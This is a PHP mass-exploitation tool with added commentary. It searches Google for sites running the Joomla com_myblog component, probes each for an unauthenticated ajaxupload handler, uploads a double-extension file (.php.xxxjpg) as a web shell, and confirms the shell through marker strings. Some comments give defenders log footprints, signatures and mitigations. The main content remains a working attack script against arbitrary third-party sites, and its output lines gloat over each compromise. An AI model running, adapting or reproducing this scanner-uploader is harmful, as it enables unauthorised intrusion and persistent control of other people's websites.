- <?php
- set_time_limit(0); // lifts PHP's execution time limit, so the request keeps running for the whole scan
- ini_set('memory_limit', '64M'); // sets the script's memory ceiling to 64M
- header('Content-Type: text/html; charset=UTF-8'); // results are rendered as an HTML page in the operator's browser
- function letItBy() { // Pushes pending output to the client so per-site results appear while the scan is still running.
- ob_flush(); // flush PHP's output buffer first
- flush(); // then flush the system write buffers
- }
- function google_that($query, $page=1){ // Fetches one page of web-search results for $query from the Google AJAX search endpoint; returns the results array, or false on a non-200 status or an empty result list.
- $resultPerPage=8; // page size, sent as rsz=
- $start = $page*$resultPerPage; // result offset, sent as start=
- $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw[&key=API_KEY_GOOGLE]&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query); // the literal "[&key=API_KEY_GOOGLE]" is a placeholder; the author notes it can be deleted when no Google API key is available
- $resultFromGoogle = json_decode( http_get($url, true) ,true); // http_get's second argument (true) makes it sleep one second before the request; the JSON reply is decoded into an associative array
- if(isset($resultFromGoogle['responseStatus'])) { // only a reply that carries responseStatus is interpreted
- if($resultFromGoogle['responseStatus'] != '200') return false; // the API reported an error status
- if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false; // no results on this page
- else return $resultFromGoogle['responseData']['results']; // list of result entries; the calling loop reads unescapedUrl and visibleUrl from each
- } else
- die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url ); // reply missing or not decodable: abort the whole script and print the request URL
- }
- function http_get($url, $safemode = false){ // GETs $url with cURL and returns the response body (curl_exec yields false on failure); when $safemode === true it sleeps one second first.
- if($safemode === true) sleep(1); // fixed one-second delay before the request
- $im = curl_init($url);
- curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); // return the body as a string instead of printing it
- curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); // give up connecting after 10 seconds; no overall transfer timeout is set
- curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); // redirects are followed
- curl_setopt($im, CURLOPT_HEADER, 0); // response headers are left out of the returned string
- return curl_exec($im);
- curl_close(); // NOTE(review): unreachable, it follows the return, so the cURL handle is never closed explicitly
- }
- function check_injection($url){ // Probes one search-result URL for the com_myblog upload handler and returns preg_match's result (1 when the handler's reply text is found).
- $data = http_get( str_replace("=com_myblog", "=com_myblog&task=ajaxupload", $url) ); // rewrites the URL to add task=ajaxupload and fetches it with no cookies or credentials; for defenders, such GETs for option=com_myblog&task=ajaxupload in web logs are this probe's footprint
- return preg_match("/No file has been uploaded/", $data); // this literal reply is taken as proof that the upload handler answers without a login
- }
- function cekshell($url) { // Requests the URL of the uploaded file and returns preg_match's result for the expected marker strings in the response.
- $d = curl_init($url);
- curl_setopt($d, CURLOPT_RETURNTRANSFER, 1); // capture the body as a string
- curl_setopt($d, CURLOPT_FOLLOWLOCATION, 1); // redirects are followed
- curl_setopt($d, CURLOPT_POST, 1); // sent as a POST; no body fields are set
- return preg_match("/IndoXploit Auto Xploiter !!!|Mr. Error 404/", curl_exec($d)); // marker strings expected in the page served by the uploaded file (the author notes they are meant to be changed per operator); for defenders, these literals are usable as content signatures when sweeping a web root
- curl_close($d); // NOTE(review): unreachable, it follows the return
- }
- ?>
- <!DOCTYPE html>
- <style type="text/css">
- a {
- text-decoration: none;
- color: green;
- }
- </style>
- <form method="post">
- Dork:
- <input style="border: 1px dashed #000; background: transparent; color: #bb0000; padding-left: 5px;" type="text" id="dork" name="dork" value="inurl:/index.php?option=com_myblog" />
- <input style="border: 1px dashed #000; background: transparent; color: #bb0000;" type="submit" value="Start" id="button"/>
- </form>
- <?php
- if(isset($_POST['dork']{0})){ // runs only when the form posted a non-empty 'dork' value (tests that its first character exists)
- echo "<hr width='50%' color='#008000'>";
- letItBy();
- for($googlePage = 1; $googlePage <= 10; $googlePage++){ // walks at most 10 search-result pages
- $googleResult = google_that($_POST['dork'], $googlePage); // the posted dork is used as the search query
- if(!$googleResult){ // false from google_that: stop at the first page without results
- echo 'google dont have more result, so I done..(?)';
- break;
- }
- for($victim = 0; $victim < sizeof($googleResult); $victim++) { // one iteration per search result on this page
- if(check_injection($googleResult[$victim]['unescapedUrl'])){ // probe the result URL for the open upload handler
- echo "<div style='margin: 5px auto; padding-left: 7px;'>";
- $site = "http://".$googleResult[$victim]['visibleUrl']."/index.php?option=com_myblog&task=ajaxupload"; // upload-handler URL built from the result's host name
- echo "[+] Scan : <font color=green> http://".$googleResult[$victim]['visibleUrl']."/</font><br>"; // values taken from the search response are written into the page without HTML escaping
- echo "[+] Ada Cuk!! => <a href='$site' target='_blank'> $site </a><br>"; // status line printed when the probe matched
- echo "[?] Bntr ya , mau di anu dulu :p<br>";
- $file = "gtg.php.xxxjpg"; // name of the local file that gets uploaded; the author requires the double extension .php.xxxjpg. NOTE(review): presumably this passes an extension check while a server that maps any name containing .php to the PHP handler still executes it; confirm. Mitigation: deny script execution in upload directories and bind the PHP handler only to names ending in .php
- $x = curl_init($site);
- curl_setopt($x, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($x, CURLOPT_POST, 1);
- curl_setopt($x, CURLOPT_POSTFIELDS, array('fileToUpload'=>"@$file")); // array body makes this a multipart POST with the form field fileToUpload; for defenders, a multipart POST to task=ajaxupload carrying that field and a .php.* file name is the upload attempt to alert on
- $res = curl_exec($x);
- preg_match("/source: '(.*?)'/", $res, $get); // pulls the stored file's location out of a "source: '...'" fragment in the reply
- $loc = $get[1]; // NOTE(review): read without checking that the pattern matched, so index 1 is undefined when it did not
- if(preg_match("/uploaded successfully|File exists|successfully uploaded|File with similar name already exist/", $res)) { // success is inferred from these reply phrases
- echo "[+] <font color=green>Wih Hoki bener lu cok !! Sukses di anu => <a href='$loc' target='_blank'> $loc </a> <==</font>","<br>"; // $loc comes from the remote reply and is printed unescaped
- if(cekshell($loc)) { // fetch the reported location and look for the marker strings
- echo "[+] <font color=green>Shell OK!! </font><br>";
- } else {
- echo "[-] <font color=red>Shell Error!! </font><br>";
- }
- } else {
- echo "[-] <font color=red>Yah Gagal Di Anu cok xixixi :p</font><br>"; // none of the success phrases were in the reply
- }
- echo "</div>";
- curl_close($x);
- }
- else echo "<div style='margin: 5px auto; padding-left: 7px;'>"; // NOTE(review): the braceless else covers only this echo; the next three statements run for every result, including ones reported as found above
- echo "[+] Scan : <font color=green> http://".$googleResult[$victim]['visibleUrl']."/</font><br>";
- echo "[-] <font color=red>Ga nemu cuk! </font><br>";
- echo "</div>";
- letItBy(); // flush this result's output before moving to the next one
- }
- }
- }
- ?>
- </div>
- </body>
- </html>